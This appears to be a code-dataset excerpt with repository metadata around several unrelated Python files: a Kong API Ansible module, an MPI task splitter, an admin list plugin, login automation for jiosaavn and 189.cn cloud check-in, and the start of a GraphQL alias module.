|
Python
|
library/kong_api.py
|
sebastienc/ansible-kong-module
|
c1e7b471a517d1ec99c5629f3729ebc34088bd64
|
[
"MIT"
] | 34
|
2016-03-09T17:10:52.000Z
|
2019-12-25T08:31:49.000Z
|
library/kong_api.py
|
sebastienc/ansible-kong-module
|
c1e7b471a517d1ec99c5629f3729ebc34088bd64
|
[
"MIT"
] | 6
|
2016-05-16T14:09:05.000Z
|
2018-07-23T21:09:33.000Z
|
library/kong_api.py
|
sebastienc/ansible-kong-module
|
c1e7b471a517d1ec99c5629f3729ebc34088bd64
|
[
"MIT"
] | 23
|
2016-02-17T12:18:16.000Z
|
2021-05-06T09:39:35.000Z
|
#!/usr/bin/python
DOCUMENTATION = '''
---
module: kong
short_description: Configure a Kong API Gateway
'''

# BUG FIX: the original example used "taget_url", which is not a parameter
# of this module; the argument spec below defines "upstream_url".
EXAMPLES = '''
- name: Register a site
  kong:
    kong_admin_uri: http://127.0.0.1:8001/apis/
    name: "Mockbin"
    upstream_url: "http://mockbin.com"
    request_host: "mockbin.com"
    state: present

- name: Delete a site
  kong:
    kong_admin_uri: http://127.0.0.1:8001/apis/
    name: "Mockbin"
    state: absent
'''
import json, requests, os
class KongAPI:
    """Thin client for a Kong admin REST endpoint."""

    def __init__(self, base_url, auth_username=None, auth_password=None):
        self.base_url = base_url
        # Basic-auth pair only when both halves were supplied.
        self.auth = None
        if auth_username is not None and auth_password is not None:
            self.auth = (auth_username, auth_password)

    def __url(self, path):
        # Join the admin base URL with *path*.
        return "{}{}".format(self.base_url, path)

    def _api_exists(self, name, api_list):
        # True when an API entry named *name* is present in *api_list*.
        return any(name == entry.get("name", None) for entry in api_list)

    def add_or_update(self, name, upstream_url, request_host=None, request_path=None, strip_request_path=False, preserve_host=False):
        """POST a new API definition, or PATCH it when it already exists."""
        api_list = self.list().json().get("data", [])
        if self._api_exists(name, api_list):
            method = "patch"
            url = "{}{}".format(self.__url("/apis/"), name)
        else:
            method = "post"
            url = self.__url("/apis/")
        data = {
            "name": name,
            "upstream_url": upstream_url,
            "strip_request_path": strip_request_path,
            "preserve_host": preserve_host
        }
        # Optional routing fields are sent only when given.
        if request_host is not None:
            data['request_host'] = request_host
        if request_path is not None:
            data['request_path'] = request_path
        return getattr(requests, method)(url, data, auth=self.auth)

    def list(self):
        """GET all configured APIs."""
        return requests.get(self.__url("/apis"), auth=self.auth)

    def info(self, id):
        """GET a single API by id or name."""
        return requests.get(self.__url("/apis/{}".format(id)), auth=self.auth)

    def delete_by_name(self, name):
        """Resolve *name* to its id, then delete it."""
        api_id = self.info(name).json().get("id")
        return self.delete(api_id)

    def delete(self, id):
        """DELETE an API by id."""
        return requests.delete(self.__url("/apis/{}".format(id)), auth=self.auth)
class ModuleHelper:
    """Glue between Ansible module arguments and the KongAPI client."""

    def __init__(self, fields):
        # Param names forwarded to the Kong API as request payload.
        self.fields = fields

    def get_module(self):
        """Build the AnsibleModule with this module's argument spec."""
        args = dict(
            kong_admin_uri = dict(required=False, type='str'),
            kong_admin_username = dict(required=False, type='str'),
            kong_admin_password = dict(required=False, type='str'),
            name = dict(required=False, type='str'),
            upstream_url = dict(required=False, type='str'),
            request_host = dict(required=False, type='str'),
            request_path = dict(required=False, type='str'),
            strip_request_path = dict(required=False, default=False, type='bool'),
            preserve_host = dict(required=False, default=False, type='bool'),
            state = dict(required=False, default="present", choices=['present', 'absent', 'latest', 'list', 'info'], type='str'),
        )
        return AnsibleModule(argument_spec=args,supports_check_mode=False)

    def prepare_inputs(self, module):
        """Split module params into (url, data, state, auth_user, auth_password)."""
        params = module.params
        data = {
            field: params.get(field, None)
            for field in self.fields
            if params.get(field, None) is not None
        }
        return (
            params['kong_admin_uri'],
            data,
            params['state'],
            params['kong_admin_username'],
            params['kong_admin_password'],
        )

    def get_response(self, response, state):
        """Map an HTTP response to Ansible's (has_changed, meta) pair."""
        if state == "present":
            meta = response.json()
            has_changed = response.status_code in [201, 200]
        elif state == "absent":
            meta = {}
            has_changed = response.status_code == 204
        elif state == "list":
            meta = response.json()
            has_changed = False
        return (has_changed, meta)
def main():
    """Entry point: dispatch the requested state against the Kong admin API."""
    # Params forwarded verbatim from the module invocation to Kong.
    fields = [
        'name',
        'upstream_url',
        'request_host',
        'request_path',
        'strip_request_path',
        'preserve_host'
    ]
    helper = ModuleHelper(fields)
    global module # might not need this
    module = helper.get_module()
    base_url, data, state, auth_user, auth_password = helper.prepare_inputs(module)
    api = KongAPI(base_url, auth_user, auth_password)
    # NOTE(review): 'response' stays unbound for states other than
    # present/absent/list — 'latest' and 'info' are accepted by the arg
    # spec but not handled here.
    if state == "present":
        response = api.add_or_update(**data)
    if state == "absent":
        response = api.delete_by_name(data.get("name"))
    if state == "list":
        response = api.list()
    # Authentication problems are reported explicitly; anything else is
    # translated into Ansible's changed/meta result.
    if response.status_code == 401:
        module.fail_json(msg="Please specify kong_admin_username and kong_admin_password", meta=response.json())
    elif response.status_code == 403:
        module.fail_json(msg="Please check kong_admin_username and kong_admin_password", meta=response.json())
    else:
        has_changed, meta = helper.get_response(response, state)
        module.exit_json(changed=has_changed, meta=meta)
# Ansible convention: module_utils are star-imported at the bottom of a
# module file (AnsibleModule comes from module_utils.basic).
from ansible.module_utils.basic import *
from ansible.module_utils.urls import *

if __name__ == '__main__':
    main()
| 30.188889
| 133
| 0.597902
| 662
| 5,434
| 4.685801
| 0.193353
| 0.034816
| 0.054803
| 0.047389
| 0.303997
| 0.199871
| 0.179884
| 0.088975
| 0.066409
| 0.066409
| 0
| 0.008947
| 0.280088
| 5,434
| 179
| 134
| 30.357542
| 0.783998
| 0.006625
| 0
| 0.145985
| 0
| 0
| 0.159036
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.094891
| false
| 0.072993
| 0.021898
| 0.007299
| 0.211679
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
ed7d1c9bb5710045f4cb95dccf219d3b5c6faaa9
| 2,564
|
py
|
Python
|
pyfisher/mpi.py
|
borisbolliet/pyfisher
|
715e192baa4fadbff754416d2b001c3708c9276c
|
[
"BSD-3-Clause"
] | 7
|
2017-12-06T18:16:13.000Z
|
2021-02-09T19:25:26.000Z
|
pyfisher/mpi.py
|
borisbolliet/pyfisher
|
715e192baa4fadbff754416d2b001c3708c9276c
|
[
"BSD-3-Clause"
] | 34
|
2016-01-25T19:48:07.000Z
|
2021-02-03T22:34:09.000Z
|
pyfisher/mpi.py
|
borisbolliet/pyfisher
|
715e192baa4fadbff754416d2b001c3708c9276c
|
[
"BSD-3-Clause"
] | 10
|
2017-02-01T15:14:22.000Z
|
2021-02-16T01:34:16.000Z
|
from __future__ import print_function
import numpy as np
import os,sys,time
"""
Copied from orphics.mpi
"""
# Allow forcing the fake-MPI fallback via the DISABLE_MPI env var; only the
# (case-insensitive, trimmed) string "true" disables MPI.
try:
    disable_mpi_env = os.environ['DISABLE_MPI']
    disable_mpi = disable_mpi_env.lower().strip() == "true"
except KeyError:
    # Narrowed from a bare `except:` — only "env var unset" is expected
    # here, and a bare except would also swallow KeyboardInterrupt.
    disable_mpi = False
"""
Use the below cleanup stuff only for intel-mpi!
If you use it on openmpi, you will have no traceback for errors
causing hours of endless confusion and frustration! - Sincerely, past frustrated Mat
"""
# From Sigurd's enlib.mpi:
# Uncaught exceptions don't cause mpi to abort. This can lead to thousands of
# wasted CPU hours
# def cleanup(type, value, traceback):
# sys.__excepthook__(type, value, traceback)
# MPI.COMM_WORLD.Abort(1)
# sys.excepthook = cleanup
class fakeMpiComm:
    """
    A Simple Fake MPI implementation

    Mimics just enough of mpi4py's communicator API for single-process
    runs: one rank (0), world size 1, no-op Barrier/Abort.
    """
    def __init__(self):
        pass
    def Get_rank(self):
        # This process is always rank 0.
        return 0
    def Get_size(self):
        # Single-process "world".
        return 1
    def Barrier(self):
        # Nothing to synchronize with.
        pass
    def Abort(self,dummy):
        # No-op; real MPI would terminate all ranks.
        pass
# Import real MPI when possible; otherwise install a single-process fake so
# the rest of the module can use MPI.COMM_WORLD unconditionally.  The bare
# `raise` deliberately routes the DISABLE_MPI case into the fallback.
try:
    if disable_mpi: raise
    from mpi4py import MPI
except:
    if not(disable_mpi): print("WARNING: mpi4py could not be loaded. Falling back to fake MPI. This means that if you submitted multiple processes, they will all be assigned the same rank of 0, and they are potentially doing the same thing.")
    class template:
        pass
    MPI = template()
    MPI.COMM_WORLD = fakeMpiComm()
def mpi_distribute(num_tasks, avail_cores, allow_empty=False):
    """Partition task indices 0..num_tasks-1 across avail_cores workers.

    Returns (num_each, task_dist): an integer array with the task count
    per core and a list of per-core task-index lists.  Remainder tasks go
    to the highest-ranked cores, so rank 0 never carries extra work.
    """
    # copied to mapsims.convert_noise_templates
    if not allow_empty:
        assert avail_cores <= num_tasks
    base, leftover = divmod(num_tasks, avail_cores)
    num_each = np.array([base] * avail_cores)
    if leftover > 0:
        num_each[-leftover:] += 1
    ends = np.cumsum(num_each).tolist()          # end index for each core
    starts = [0] + ends[:-1]                     # matching start indices
    all_tasks = list(range(num_tasks))
    task_dist = [all_tasks[lo:hi] for lo, hi in zip(starts, ends)]
    assert sum(num_each) == num_tasks
    assert len(num_each) == avail_cores
    assert len(task_dist) == avail_cores
    return num_each, task_dist
def distribute(njobs,verbose=True,**kwargs):
    """Split njobs across all MPI ranks; return (comm, rank, my_tasks).

    my_tasks is the list of job indices assigned to the calling rank.
    NOTE(review): `verbose` is accepted but unused — the rank-0 print
    happens unconditionally.
    """
    comm = MPI.COMM_WORLD
    rank = comm.Get_rank()
    numcores = comm.Get_size()
    # kwargs (e.g. allow_empty) are forwarded to mpi_distribute.
    num_each,each_tasks = mpi_distribute(njobs,numcores,**kwargs)
    if rank==0: print ("At most ", max(num_each) , " tasks...")
    my_tasks = each_tasks[rank]
    return comm,rank,my_tasks
| 29.813953
| 242
| 0.697738
| 391
| 2,564
| 4.409207
| 0.432225
| 0.032483
| 0.020882
| 0.020882
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.0059
| 0.206708
| 2,564
| 85
| 243
| 30.164706
| 0.841691
| 0.207878
| 0
| 0.166667
| 0
| 0.020833
| 0.135747
| 0
| 0
| 0
| 0
| 0
| 0.083333
| 1
| 0.145833
| false
| 0.083333
| 0.083333
| 0.041667
| 0.354167
| 0.0625
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
9c13630030f6d62b875010ab48a5f1a305094328
| 1,266
|
py
|
Python
|
nadmin/plugins/sortable.py
|
A425/django-xadmin-1.8
|
9ab06192311b22ec654778935ce3e3c5ffd39a00
|
[
"MIT"
] | 1
|
2015-10-10T08:04:26.000Z
|
2015-10-10T08:04:26.000Z
|
nadmin/plugins/sortable.py
|
A425/django-xadmin-1.8
|
9ab06192311b22ec654778935ce3e3c5ffd39a00
|
[
"MIT"
] | 1
|
2016-03-25T01:41:36.000Z
|
2016-03-25T01:41:36.000Z
|
nadmin/plugins/sortable.py
|
A425/django-xadmin-1.8
|
9ab06192311b22ec654778935ce3e3c5ffd39a00
|
[
"MIT"
] | null | null | null |
#coding:utf-8
from nadmin.sites import site
from nadmin.views import BaseAdminPlugin, ListAdminView
# Query-string key that triggers sortable behaviour on a changelist page.
SORTBY_VAR = '_sort_by'


class SortablePlugin(BaseAdminPlugin):
    """nadmin list-view plugin that loads the sortable JS vendor bundle.

    Active when the admin class declares `sortable_fields` and the request
    carries the `_sort_by` query parameter.
    """
    sortable_fields = ['sort']

    # Media
    def get_media(self, media):
        # Attach the sortable JS only when sorting is requested.
        if self.sortable_fields and self.request.GET.get(SORTBY_VAR):
            media = media + self.vendor('nadmin.plugin.sortable.js')
        return media

    # Block Views
    def block_top_toolbar(self, context, nodes):
        # NOTE(review): toolbar rendering is stubbed out; the commented
        # block below looks copied from the refresh plugin — confirm
        # whether it should be removed or adapted.
        if self.sortable_fields:
            pass
            # current_refresh = self.request.GET.get(REFRESH_VAR)
            # context.update({
            # 'has_refresh': bool(current_refresh),
            # 'clean_refresh_url': self.admin_view.get_query_string(remove=(REFRESH_VAR,)),
            # 'current_refresh': current_refresh,
            # 'refresh_times': [{
            # 'time': r,
            # 'url': self.admin_view.get_query_string({REFRESH_VAR: r}),
            # 'selected': str(r) == current_refresh,
            # } for r in self.refresh_times],
            # })
            # nodes.append(loader.render_to_string('nadmin/blocks/refresh.html', context_instance=context))


site.register_plugin(SortablePlugin, ListAdminView)
| 34.216216
| 107
| 0.611374
| 139
| 1,266
| 5.330935
| 0.453237
| 0.094467
| 0.037787
| 0.053981
| 0.080972
| 0.080972
| 0.080972
| 0
| 0
| 0
| 0
| 0.001093
| 0.277251
| 1,266
| 36
| 108
| 35.166667
| 0.808743
| 0.436809
| 0
| 0
| 0
| 0
| 0.053009
| 0.035817
| 0
| 0
| 0
| 0
| 0
| 1
| 0.153846
| false
| 0.076923
| 0.153846
| 0
| 0.538462
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
9c48342a450b3888ddd355595c9462c4c225a106
| 2,880
|
py
|
Python
|
account_processing.py
|
amitjoshi9627/Playong
|
d54a8db05ae5035e122b8bc8d84c849f25483005
|
[
"MIT"
] | 4
|
2019-04-22T15:16:45.000Z
|
2020-01-17T12:57:09.000Z
|
account_processing.py
|
amitjoshi9627/Playong
|
d54a8db05ae5035e122b8bc8d84c849f25483005
|
[
"MIT"
] | null | null | null |
account_processing.py
|
amitjoshi9627/Playong
|
d54a8db05ae5035e122b8bc8d84c849f25483005
|
[
"MIT"
] | null | null | null |
from selenium.webdriver import Firefox
from selenium.webdriver.firefox.options import Options
import getpass
import time
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.action_chains import ActionChains
from utils import *
def login_user(browser, email='', password=''):
    """Log into jiosaavn in *browser*, prompting for credentials when
    none are supplied."""
    print('Redirecting to login page..')
    browser.find_element_by_xpath('//*[@id="login-btn"]').click()
    # BUG FIX: compare with ==, not `is` — identity of string literals is
    # a CPython implementation detail (the original `email is ''` emits a
    # SyntaxWarning and can silently misbehave).
    if email == '':
        email, password = take_credentials()
    browser.find_element_by_id("login_username").send_keys(email)
    browser.find_element_by_id("login_password").send_keys(password)
    complete_captcha(browser)
    # Give the captcha/redirect time to settle before submitting.
    time.sleep(4)
    browser.find_element_by_xpath('//*[@id="static-login-btn"]').click()
def logout_user(browser):
    """Log the user out of jiosaavn via the account dropdown menu."""
    print("\nThank you for your using the program! Logging you out from jiosaavn...")
    show_notificaton("Thank", "You", 0)
    # Hover over the user-name element so the dropdown opens, then click it.
    action = ActionChains(browser)
    menu = browser.find_element_by_class_name('user-name')
    action.move_to_element(menu).perform()
    menu.click()
    # Position-based XPath to the logout link — brittle if site markup changes.
    browser.find_element_by_xpath(
        '/html/body/div[2]/div/div[2]/div[3]/div[3]/ol/li[4]/a').click()
    time.sleep(2)
    print('Logout..successful...')
def check_credentials(browser):
    """Return True when login appears to have succeeded.

    Success is inferred from the post-login page: being able to dismiss
    the promo ad and accept the cookie banner.  Any failure there is
    treated as a bad login.
    """
    print('Checking credentials...Please wait..')
    time.sleep(5)
    try:
        close_promo_ad(browser)
        accept_cookies(browser)
        success = True
    except Exception:
        # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
        # still propagate; any page/driver error means login failed.
        success = False
    return success
def wrong_credentials_check(browser, counts=1):
    """Re-prompt for credentials until login succeeds or 4 attempts pass.

    Returns the total number of attempts made.
    """
    # BUG FIX: `success` was read before any assignment, raising a
    # NameError on the first loop test.  This helper is only called after
    # a failed login, so start from the failed state and retry.
    success = False
    while success != True:
        print("\nWrong username/password entered.Please try again...\n")
        email = input("Enter your email for jiosaavn account: ")
        password = getpass.getpass(f"Enter password for {email}: ")
        email_element = browser.find_element_by_id("login_username")
        email_element.clear()
        email_element.send_keys(email)
        pswd_element = browser.find_element_by_id("login_password")
        pswd_element.clear()
        pswd_element.send_keys(password)
        browser.find_element_by_xpath('//*[@id="static-login-btn"]').click()
        success = check_credentials(browser)
        counts += 1
        if counts > 4:
            print('Too many unsuccessful attempts done. Exiting...\n')
            break
    return counts
def go_without_login(browser):
    # Guest mode: no login performed; caller treats False as "not logged in".
    return False
def take_credentials():
    """Prompt for jiosaavn email and password (password input is hidden)."""
    email = input("Enter your email for jiosaavn account: ")
    password = getpass.getpass(f"Enter password for {email}: ")
    return email, password
def prompt(browser):
    """Entry point that used to offer a login choice; login is currently
    disabled, so this always proceeds as a guest."""
    # NOTE(review): original interactive flow kept for reference.
    # response = int(input("Press 1 to Log in with you account else Press 0: "))
    # if response:
    # login_user(browser)
    # return True
    # else:
    # go_without_login(browser)
    print("Due to some issues.. Login Option is not available currently! Sorry for the inconvenience caused.")
    go_without_login(browser)
| 32.359551
| 110
| 0.682986
| 370
| 2,880
| 5.140541
| 0.345946
| 0.05205
| 0.085174
| 0.094637
| 0.247108
| 0.233964
| 0.219769
| 0.138801
| 0.138801
| 0.138801
| 0
| 0.006061
| 0.197917
| 2,880
| 88
| 111
| 32.727273
| 0.817316
| 0.056597
| 0
| 0.092308
| 0
| 0.015385
| 0.254982
| 0.047232
| 0
| 0
| 0
| 0
| 0
| 1
| 0.107692
| false
| 0.153846
| 0.107692
| 0.015385
| 0.276923
| 0.107692
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
92e1c91fec4c34f39e9e2622024fad4489b61749
| 5,279
|
py
|
Python
|
scripts/C189/C189Checkin.py
|
xiaopowanyi/py_scripts
|
29f240800eefd6e0f91fd098c35ac3c451172ff8
|
[
"MIT"
] | 2
|
2020-11-14T05:42:49.000Z
|
2020-11-14T05:43:13.000Z
|
scripts/C189/C189Checkin.py
|
J220541674/py_scripts
|
2b72e23041392a2e5f0a7305d7e9802054978384
|
[
"MIT"
] | null | null | null |
scripts/C189/C189Checkin.py
|
J220541674/py_scripts
|
2b72e23041392a2e5f0a7305d7e9802054978384
|
[
"MIT"
] | null | null | null |
import requests, time, re, rsa, json, base64
from urllib import parse
# Shared HTTP session so cookies persist across login and sign-in calls.
s = requests.Session()
# Fill these in to skip the interactive prompts at import time.
username = ""
password = ""
if(username == "" or password == ""):
    username = input("账号:")
    password = input("密码:")
def main():
    """Daily 189 (Tianyi) cloud check-in: sign in, then attempt both
    lottery draws, printing the outcome of each step."""
    login(username, password)
    rand = str(round(time.time()*1000))
    surl = f'https://api.cloud.189.cn/mkt/userSign.action?rand={rand}&clientType=TELEANDROID&version=8.6.3&model=SM-G930K'
    url = f'https://m.cloud.189.cn/v2/drawPrizeMarketDetails.action?taskId=TASK_SIGNIN&activityId=ACT_SIGNIN'
    url2 = f'https://m.cloud.189.cn/v2/drawPrizeMarketDetails.action?taskId=TASK_SIGNIN_PHOTOS&activityId=ACT_SIGNIN'
    # Mobile-client headers shared by the sign-in and both draw requests
    # (the original duplicated this dict verbatim).
    headers = {
        'User-Agent':'Mozilla/5.0 (Linux; Android 5.1.1; SM-G930K Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/74.0.3729.136 Mobile Safari/537.36 Ecloud/8.6.3 Android/22 clientId/355325117317828 clientModel/SM-G930K imsi/460071114317824 clientChannelId/qq proVersion/1.0.6',
        "Referer" : "https://m.cloud.189.cn/zhuanti/2016/sign/index.jsp?albumBackupOpened=1",
        "Host" : "m.cloud.189.cn",
        "Accept-Encoding" : "gzip, deflate",
    }
    response = s.get(surl,headers=headers)
    netdiskBonus = response.json()['netdiskBonus']
    if(response.json()['isSign'] == "false"):
        print(f"未签到,签到获得{netdiskBonus}M空间")
    else:
        print(f"已经签到过了,签到获得{netdiskBonus}M空间")
    # First prize draw.
    response = s.get(url,headers=headers)
    try:
        if ("errorCode" in response.text):
            print(response.json()['errorCode'])
        # BUG FIX: dict.has_key() was removed in Python 3 (this file
        # already uses f-strings, so it runs on Python 3); use `in`.
        elif ('description' in response.json()):
            description = response.json()['description']
            print(f"抽奖获得{description}")
    except Exception:
        print(f"抽奖1完成,解析时失败")
    # Second prize draw.
    try:
        response2 = s.get(url2,headers=headers)
        if ("errorCode" in response2.text):
            # BUG FIX: this branch printed from `response` (the first
            # draw) instead of `response2`.
            print(response2.json()['errorCode'])
        elif ('description' in response2.json()):
            description = response2.json()['description']
            print(f"抽奖2获得{description}")
    except Exception:
        print(f"抽奖2完成,解析时失败")
# Digit characters for base-36/hex output (used by b64tohex below).
BI_RM = list("0123456789abcdefghijklmnopqrstuvwxyz")

def int2char(a):
    """Map an integer 0-35 to its digit character in BI_RM."""
    return BI_RM[a]

# Standard base64 alphabet; index() maps a char back to its 6-bit value.
b64map = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
def b64tohex(a):
    """Convert a base64 string to a lowercase hex string.

    Port of the b64tohex helper from 189.cn's login JS: walks the base64
    characters, regrouping their 6-bit values into 4-bit nibbles via a
    small state machine (`e` tracks alignment, `c` carries leftover bits).
    Padding '=' characters are skipped.
    """
    d = ""
    e = 0  # alignment state (how many 6-bit chunks consumed mod the cycle)
    c = 0  # leftover bits carried into the next nibble
    for i in range(len(a)):
        if list(a)[i] != "=":
            v = b64map.index(list(a)[i])
            if 0 == e:
                # 6 bits in: emit top 4, carry low 2.
                e = 1
                d += int2char(v >> 2)
                c = 3 & v
            elif 1 == e:
                # carry(2) + top 2 bits form a nibble; carry low 4.
                e = 2
                d += int2char(c << 2 | v >> 4)
                c = 15 & v
            elif 2 == e:
                # carry(4) is a full nibble; top 4 bits are the next; carry low 2.
                e = 3
                d += int2char(c)
                d += int2char(v >> 2)
                c = 3 & v
            else:
                # carry(2) + top 2 form a nibble; low 4 form another; realign.
                e = 0
                d += int2char(c << 2 | v >> 4)
                d += int2char(15 & v)
    if e == 1:
        # One dangling 2-bit carry left — pad it out as a final nibble.
        d += int2char(c << 2)
    return d
def rsa_encode(j_rsakey, string):
    """RSA-encrypt *string* with the server-supplied public key.

    The key arrives as a bare base64 body; wrap it in PEM markers so
    rsa.PublicKey.load_pkcs1_openssl_pem can parse it, then return the
    ciphertext re-encoded to hex via b64tohex (the format the login
    form expects).
    """
    rsa_key = f"-----BEGIN PUBLIC KEY-----\n{j_rsakey}\n-----END PUBLIC KEY-----"
    pubkey = rsa.PublicKey.load_pkcs1_openssl_pem(rsa_key.encode())
    result = b64tohex((base64.b64encode(rsa.encrypt(f'{string}'.encode(), pubkey))).decode())
    return result
def calculate_md5_sign(params):
    """MD5 signature over a query string: the '&'-separated pairs are
    sorted lexicographically, re-joined with '&', and hashed as UTF-8.

    BUG FIX: `hashlib` was used here but never imported anywhere in the
    file (calling this raised NameError); import it locally so the
    function is self-contained.
    """
    import hashlib
    canonical = '&'.join(sorted(params.split('&')))
    return hashlib.md5(canonical.encode('utf-8')).hexdigest()
def login(username, password):
    """Perform the 189.cn OAuth login flow on the shared session `s`.

    Scrapes captchaToken/lt/returnUrl/paramId and the RSA public key from
    the login page, RSA-encrypts the credentials, submits the login form,
    then follows the redirect so `s` carries authenticated cookies.
    Returns the session.
    """
    url = "https://cloud.189.cn/udb/udb_login.jsp?pageId=1&redirectURL=/main.action"
    r = s.get(url)
    # Hidden form fields embedded in the login page's HTML/JS.
    captchaToken = re.findall(r"captchaToken' value='(.+?)'", r.text)[0]
    lt = re.findall(r'lt = "(.+?)"', r.text)[0]
    returnUrl = re.findall(r"returnUrl = '(.+?)'", r.text)[0]
    paramId = re.findall(r'paramId = "(.+?)"', r.text)[0]
    j_rsakey = re.findall(r'j_rsaKey" value="(\S+)"', r.text, re.M)[0]
    s.headers.update({"lt": lt})
    # Credentials are sent RSA-encrypted, flagged with the {RSA} prefix.
    username = rsa_encode(j_rsakey, username)
    password = rsa_encode(j_rsakey, password)
    url = "https://open.e.189.cn/api/logbox/oauth2/loginSubmit.do"
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/76.0',
        'Referer': 'https://open.e.189.cn/',
    }
    data = {
        "appKey": "cloud",
        "accountType": '01',
        "userName": f"{{RSA}}{username}",
        "password": f"{{RSA}}{password}",
        "validateCode": "",
        "captchaToken": captchaToken,
        "returnUrl": returnUrl,
        "mailSuffix": "@189.cn",
        "paramId": paramId
    }
    r = s.post(url, data=data, headers=headers, timeout=5)
    # NOTE(review): both branches print the same message; result == 0 is
    # presumably the success code — confirm before branching on it.
    if(r.json()['result'] == 0):
        print(r.json()['msg'])
    else:
        print(r.json()['msg'])
    redirect_url = r.json()['toUrl']
    r = s.get(redirect_url)
    return s
if __name__ == "__main__":
    # Run the check-in when invoked as a script.
    main()
| 37.707143
| 305
| 0.586664
| 683
| 5,279
| 4.481698
| 0.311859
| 0.017968
| 0.026135
| 0.021562
| 0.352499
| 0.32179
| 0.282914
| 0.273767
| 0.273767
| 0.273767
| 0
| 0.07761
| 0.23603
| 5,279
| 139
| 306
| 37.978417
| 0.681379
| 0
| 0
| 0.24
| 0
| 0.072
| 0.385111
| 0.043758
| 0
| 0
| 0
| 0
| 0
| 1
| 0.048
| false
| 0.056
| 0.016
| 0.016
| 0.104
| 0.08
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
92f8d1944416ddff1cb95f31ed4c8d93f364c956
| 5,193
|
py
|
Python
|
src/nebulo/gql/alias.py
|
olirice/nebulo
|
de9b043fe66d0cb872c5c0f2aca3c5c6f20918a7
|
[
"MIT"
] | 76
|
2020-04-03T01:21:47.000Z
|
2021-12-06T02:54:53.000Z
|
src/nebulo/gql/alias.py
|
olirice/nebulo
|
de9b043fe66d0cb872c5c0f2aca3c5c6f20918a7
|
[
"MIT"
] | 7
|
2020-04-06T04:44:10.000Z
|
2021-05-17T12:38:15.000Z
|
src/nebulo/gql/alias.py
|
olirice/nebulo
|
de9b043fe66d0cb872c5c0f2aca3c5c6f20918a7
|
[
"MIT"
] | 2
|
2020-10-23T10:25:16.000Z
|
2020-10-28T14:16:57.000Z
|
# pylint: disable=missing-class-docstring,invalid-name
import typing
from graphql.language import (
InputObjectTypeDefinitionNode,
InputObjectTypeExtensionNode,
ObjectTypeDefinitionNode,
ObjectTypeExtensionNode,
)
from graphql.type import (
GraphQLArgument,
GraphQLBoolean,
GraphQLEnumType,
GraphQLEnumValue,
GraphQLField,
GraphQLFieldMap,
GraphQLFloat,
GraphQLID,
GraphQLInputFieldMap,
GraphQLInputObjectType,
GraphQLInt,
GraphQLInterfaceType,
GraphQLIsTypeOfFn,
GraphQLList,
GraphQLNonNull,
GraphQLObjectType,
GraphQLResolveInfo,
GraphQLScalarType,
GraphQLSchema,
GraphQLString,
GraphQLType,
Thunk,
)
from graphql.type.definition import GraphQLInputFieldOutType
from nebulo.sql.composite import CompositeType as SQLACompositeType
# Handle name changes from graphql-core and graphql-core-next
try:
from graphql.type import GraphQLInputObjectField as GraphQLInputField
except ImportError:
from graphql.type import GraphQLInputField
# Short aliases so the rest of nebulo can avoid the GraphQL* prefixes.
# (List/Type intentionally shadow builtins — this module is an alias layer.)
Type = GraphQLType
List = GraphQLList
NonNull = GraphQLNonNull
Argument = GraphQLArgument
Boolean = GraphQLBoolean
String = GraphQLString
ScalarType = GraphQLScalarType
ID = GraphQLID
InterfaceType = GraphQLInterfaceType
Int = GraphQLInt
InputField = GraphQLInputField
ResolveInfo = GraphQLResolveInfo
EnumValue = GraphQLEnumValue
Schema = GraphQLSchema
Field = GraphQLField
Float = GraphQLFloat
# BUG FIX: EnumType was assigned twice in the original; keep one binding.
EnumType = GraphQLEnumType
class HasSQLAModel:  # pylint: disable= too-few-public-methods
    """Mixin marking a GraphQL type as backed by a SQLAlchemy model."""
    sqla_table = None


class HasSQLFunction:  # pylint: disable= too-few-public-methods
    """Mixin marking a GraphQL type as backed by a SQL function."""
    sql_function = None


class HasSQLAComposite:  # pylint: disable= too-few-public-methods
    """Mixin marking a GraphQL type as backed by a SQLA composite type."""
    sqla_composite: SQLACompositeType
class ObjectType(GraphQLObjectType, HasSQLAModel):
    """GraphQLObjectType that also remembers the SQLAlchemy model
    (`sqla_model`) it was generated from."""

    def __init__(
        self,
        name: str,
        fields: Thunk[GraphQLFieldMap],
        interfaces: typing.Optional[Thunk[typing.Collection["GraphQLInterfaceType"]]] = None,
        is_type_of: typing.Optional[GraphQLIsTypeOfFn] = None,
        extensions: typing.Optional[typing.Dict[str, typing.Any]] = None,
        description: typing.Optional[str] = None,
